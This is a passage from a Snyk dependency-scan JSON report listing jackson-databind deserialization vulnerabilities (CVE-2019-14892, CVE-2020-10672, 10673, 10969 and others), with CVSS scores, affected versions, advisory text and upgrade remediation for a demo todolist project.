"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.500842Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt doesn't block `common-configuration` JNDI classes `org.apache.commons.configuration.JNDIConfiguration` and `org.apache.commons.configuration2.JNDIConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2462)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2469)\n- [RedHat Bugzilla](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892)\n", - "epssDetails": { - "percentile": "0.73523", - "probability": "0.00392", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14892", - "CVE-2019-14893" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-cf6r-3wgc-h863", - "GHSA-qmqc-x3r4-6v39" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-03T08:13:33.357434Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.3)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-02T17:09:34Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-02T17:09:34Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.500842Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15", - "title": "GitHub Commit (Master)" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2660", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "On Jackson CVE's Blog" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-10673", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:50:14.029596Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:50.167932Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:45.907430Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:14.029596Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:50.167932Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.caucho.config.types.ResourceRef` (aka `caucho-quercus`).\r\n\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2660)\n- [On Jackson CVE's Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-10673)\n", - "epssDetails": { - "percentile": "0.81511", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10673" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-fqwf-pjwf-7vqv" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-19T14:36:02.644920Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-18T22:56:21Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-18T22:56:21Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.167932Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d", - "title": "GitHub Commit (Master)" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2659", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "On Jackson CVEs: Don’t Panic" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:51:25.975313Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:53.920721Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:35.299190Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:25.975313Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:53.920721Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory` (aka `aries.transaction.jms`). \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2659)\n- [On Jackson CVEs: Don’t Panic](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.81511", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10672" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-95cm-88f5-f2c7" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-19T15:03:20.847507Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-18T22:56:24Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-18T22:56:24Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.920721Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.7.9.7)", - "[2.8.0,2.8.11.6)", - "[2.9.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.7.9.7", - "2.8.11.6", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2642", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:50:19.998455Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.582959Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:57.137266Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:19.998455Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.582959Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `javax.swing.JEditorPane`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2642)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.81534", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10969" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-758m-v56v-grj4" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-26T16:25:31.113677Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-26T14:55:31Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-26T14:55:31Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.582959Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2662", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:51:25.268261Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:53:54.576513Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:38.826605Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:25.268261Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.576513Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `org.aoju.bus.proxy.provider.remoting.RmiProvider` (aka bus-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered 